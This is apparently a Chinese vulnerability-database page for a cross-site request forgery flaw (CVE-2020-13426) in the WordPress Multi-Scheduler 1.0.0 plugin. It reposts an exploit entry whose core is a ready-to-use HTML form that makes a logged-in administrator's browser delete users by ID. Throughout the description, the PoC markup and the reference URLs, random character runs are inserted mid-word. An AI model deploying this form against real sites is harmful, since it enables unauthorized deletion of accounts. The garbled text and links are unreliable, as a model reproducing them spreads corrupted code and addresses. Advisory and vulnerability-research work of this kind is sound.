WordPress Multi-Scheduler 跨站请求伪造漏洞

xuanyun 2020-06-27 漏洞列表 435

ECS 云服务器 SWAS 轻量应用服务器 RDS 云数据库 Redis 云数据库 CDN 内容分发 OSS 对象存储 SLB 负载均衡 NAT 网关 DNS 云解析 MAIL 企业邮箱 WAF 应用防火墙 DDoS 高防 SMS 短信包 MK 云市场 XIN 心选 IM 商标注册 JZ 自营建站
漏洞ID 2044245 漏洞类型 跨站请求伪造
发布时间 2020-05-30 更新时间 2020-06-23
CVE编号 CVE-2020-13426

 CNNVD-ID CNNVD-202006-1548
漏洞平台 N/A CVSS评分 N/A6 A E ! q O s $
|漏洞来源
https://cxsecurity.com/issue/WLB-2020050235
http://www.cnnvd.org3 b e ) g R ; E b.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202006-1548
|漏洞详情
WordPressWordPress基金会的一套使用PHP语言开发的博客平[ I 6台。该平台支持在PHP和MySQL的服务* A - D r W `器上架设个人博客网站。MM Q K 6 _ ` G ulm ] L u 5 7ti-SJ 6 |cheduleE J T 9r是使用在其F | y E n X z Z中的一8 D | j 9 : D v t个调度器插件。
WordPress Multi-Scheduler 1.7 Z U 8 e z0.0版本中存在% U A跨站请求伪造漏洞。该漏洞源于WEB应用未充分验证请求是否来自可信用户。攻击者可利用该漏洞通过0 + / |受影响客户端向服务器发送非预期的请求。
|漏洞EXP
# Exploit Title: Wor` F S n / v &  bdPress Pl% % , jugin Mul) y  8 Eti-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)
# Google Dork: N/A
# Date: 2020-05-21
# Auz s H b  _ K / jthor Homepage: https://infayer.cA  F  M c 2 Xom/
# Exploit Author: UnD3sc0nn , / 7 V ~ U0c1d0
# Vendor Homepage: https://www.bdtask.com/
# Software Link: https://downloads.wordpress.org/plugin/multi-schedulerU N F 0 i k 1 C.1.0.0.ziL y T Vp
# Category: Web AppV R N H } i Slication
# Version: 1.0.0
# Tested on: CentOS 7 / WordPresw = X d 2 0 =s 5.4.1
## o 2 :  } t 5 . CVE : CVE-2020-13426
# 1. Technical Description:
The Multi-Scheduler plugin 1.0.0 for WordPress has a Cross-Site ReI k @  Rquest Forgery (CSRF) vulnerability
in the forms it presentsB F [ o h | w, allowing the possibility of deleting records (users) when an ID is known.
# 2. PV P Q L : & ( ) xroof of Concept (PoC):
<html>
<form method="POST" action="ht} I o wtp://[TARGET]/wp-admin/admin.php?page=msbdt_profL q . M H , n / Dessional">
<input type="hidden" value=y 0 F = o 1"[IF e z lD]" name="pro_delete_id"><br>
<input type="hidden: g _ B m f P 3" vJ ( ; e T B yalue="Delete" name="professional_delete">
<input type="submit" value="Delete user">v B 6
</form>
</* e : 8 ^ @ r Whtml>
|参考资料j ) W

来源:MISC

链接:https://cxsecurity.com/issue/WLB-2020050235

来源:MISC

链接:https://infayer.com/archivos/448

来源:EXPLOIT-DB

链接:https://www.exploit-db.com/exploits/48532

来源:MISC

链接:https://wordpress.org/plugins/multi-scheduler/#developers

来源:MISC

链接:https://twitter.com/UnD3sc0n0c1d0

来源:M: ] w b L G 9 d 1ISC

链接:hP | q + u Dttps://packetstormseK J I s Bcurity.com/f| A Piles/157867/WordPress-Multif r _ a 4 p-Scheduler-1.0.0-Cross-SO j y Q ^ & g 8ite-RequV - 5est-Forgery.htd } K B j T ,m{ n W % 3 wl

来源:MISC

链接:https://research-labs.net/search/exploits/w@ Q j d 0 j n jordpress-plugin-multi-schedul9 d s f ^ eer-100-cross-site-request-forgery-delete-uU J Lser

来源:MISC

链接:https://0day.toB : day/exploit/34496

来源:nvd.nist.gov

链接:h ? x 3 : 3 Z https://nvd.nist.gov/vuln/detail/CVE-2020-13426